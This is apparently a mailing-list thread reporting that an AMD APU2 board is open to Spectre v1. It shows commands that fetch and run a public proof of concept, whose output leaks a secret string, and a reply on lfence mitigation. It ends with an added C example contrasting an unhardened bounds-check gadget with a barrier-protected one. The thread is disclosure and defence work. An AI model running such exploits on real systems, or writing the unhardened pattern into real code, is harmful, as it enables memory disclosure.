On Sat, Aug 25, 2018 at 06:08:49PM +0300, Consus wrote:
> Hi,
> 
> Seems like the APU2 board is vulnerable to Spectre:
> 
>       $ uname -r
>       6.3
>       $ dmesg | grep cpu0 | grep AMD
>       cpu0: AMD GX-412TC SOC, 998.27 MHz
>       $ git clone https://github.com/crozone/SpectrePoC
>       $ cd SpectrePoC
>       $ gmake
>       $ ./spectre.out 85
>       Using a cache hit threshold of 85.
>       Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
>       Reading 40 bytes:
>       Reading at malicious_x = 0xffffffffffeff180... Success: 0x54=’T’ score=2
>       Reading at malicious_x = 0xffffffffffeff181... Success: 0x68=’h’ score=2
>       Reading at malicious_x = 0xffffffffffeff182... Success: 0x65=’e’ score=2
>       Reading at malicious_x = 0xffffffffffeff183... Success: 0x20=’ ’ score=2
>       Reading at malicious_x = 0xffffffffffeff184... Success: 0x4D=’M’ score=2
>       Reading at malicious_x = 0xffffffffffeff185... Success: 0x61=’a’ score=2
>       Reading at malicious_x = 0xffffffffffeff186... Success: 0x67=’g’ score=2
>       Reading at malicious_x = 0xffffffffffeff187... Success: 0x69=’i’ score=2
>       Reading at malicious_x = 0xffffffffffeff188... Success: 0x63=’c’ score=2
>       Reading at malicious_x = 0xffffffffffeff189... Success: 0x20=’ ’ score=2
>       Reading at malicious_x = 0xffffffffffeff18a... Success: 0x57=’W’ score=2
>       Reading at malicious_x = 0xffffffffffeff18b... Success: 0x6F=’o’ score=2
>       Reading at malicious_x = 0xffffffffffeff18c... Success: 0x72=’r’ score=2
>       Reading at malicious_x = 0xffffffffffeff18d... Success: 0x64=’d’ score=2
>       Reading at malicious_x = 0xffffffffffeff18e... Success: 0x73=’s’ score=2
>       Reading at malicious_x = 0xffffffffffeff18f... Success: 0x20=’ ’ score=2
>       Reading at malicious_x = 0xffffffffffeff190... Success: 0x61=’a’ score=2
>       Reading at malicious_x = 0xffffffffffeff191... Success: 0x72=’r’ score=2
>       Reading at malicious_x = 0xffffffffffeff192... Success: 0x65=’e’ score=2
>       Reading at malicious_x = 0xffffffffffeff193... Success: 0x20=’ ’ score=2
>       Reading at malicious_x = 0xffffffffffeff194... Success: 0x53=’S’ score=2
>       Reading at malicious_x = 0xffffffffffeff195... Success: 0x71=’q’ score=2
>       Reading at malicious_x = 0xffffffffffeff196... Success: 0x75=’u’ score=2
>       Reading at malicious_x = 0xffffffffffeff197... Success: 0x65=’e’ score=2
>       Reading at malicious_x = 0xffffffffffeff198... Success: 0x61=’a’ score=2
>       Reading at malicious_x = 0xffffffffffeff199... Success: 0x6D=’m’ score=2
>       Reading at malicious_x = 0xffffffffffeff19a... Success: 0x69=’i’ score=2
>       Reading at malicious_x = 0xffffffffffeff19b... Success: 0x73=’s’ score=2
>       Reading at malicious_x = 0xffffffffffeff19c... Success: 0x68=’h’ score=2
>       Reading at malicious_x = 0xffffffffffeff19d... Success: 0x20=’ ’ score=2
>       Reading at malicious_x = 0xffffffffffeff19e... Success: 0x4F=’O’ score=2
>       Reading at malicious_x = 0xffffffffffeff19f... Success: 0x73=’s’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a0... Success: 0x73=’s’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a1... Success: 0x69=’i’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a2... Success: 0x66=’f’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a3... Success: 0x72=’r’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a4... Success: 0x61=’a’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a5... Success: 0x67=’g’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a6... Success: 0x65=’e’ score=2
>       Reading at malicious_x = 0xffffffffffeff1a7... Success: 0x2E=’.’ score=2
> 
> I've double-checked the output of syspatch(1) and fw_update(1) but no
> pending updates exist. Am I missing something, or is there no mitigation
> for this AMD CPU family?
> 

That's Spectre v1 IIRC. And yes, AMD is susceptible. Someone will need to do the
work to move the lfence changes into llvm/clang (maybe that's already done) and
you'll need an AMD CPU with the MSR to treat lfence as serializing (that is
already committed, but you obviously need that CPU capability).

-ml
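
The lfence mitigation mentioned in the reply, shown on the bounds-check pattern that Spectre v1 targets. This is an added example, not code from the thread, from OpenBSD, or from the SpectrePoC repository; `SPEC_BARRIER`, `init_probe`, `victim_unhardened`, `victim_lfence` and the array contents are names and data made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* LFENCE keeps later loads from executing until the bounds check has
 * completed, provided the CPU treats it as serializing (on AMD, the MSR
 * setting mentioned in the reply).
 * Assumption: non-x86 builds get a compiler barrier only, so the file builds. */
#if defined(__x86_64__) || defined(__i386__)
#define SPEC_BARRIER() __asm__ __volatile__("lfence" ::: "memory")
#else
#define SPEC_BARRIER() __asm__ __volatile__("" ::: "memory")
#endif

#define ARRAY1_SIZE 16u
#define STRIDE 512u                 /* one cache-distinct slot per byte value */

static uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8,
                                      9, 10, 11, 12, 13, 14, 15, 16};
static uint8_t array2[256 * STRIDE];

/* Constructed sample data: slot i holds i so results can be checked. */
void init_probe(void) {
    for (size_t i = 0; i < 256; i++)
        array2[i * STRIDE] = (uint8_t)i;
}

/* Bounds check only: architecturally correct, but the dependent loads can
 * still run speculatively with an out-of-range x while the branch resolves. */
uint8_t victim_unhardened(size_t x) {
    if (x < ARRAY1_SIZE)
        return array2[array1[x] * STRIDE];
    return 0;
}

/* Same check with a speculation barrier between the branch and the loads. */
uint8_t victim_lfence(size_t x) {
    if (x < ARRAY1_SIZE) {
        SPEC_BARRIER();
        return array2[array1[x] * STRIDE];
    }
    return 0;
}

int main(void) {
    init_probe();
    printf("in range: %u, out of range: %u\n",
           (unsigned)victim_lfence(3), (unsigned)victim_lfence((size_t)-1));
    return 0;
}
```

Both functions return the same values; the difference is only in what the CPU may do speculatively before the branch resolves, which is why a compiler has to insert the barrier rather than the source-level check being enough.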
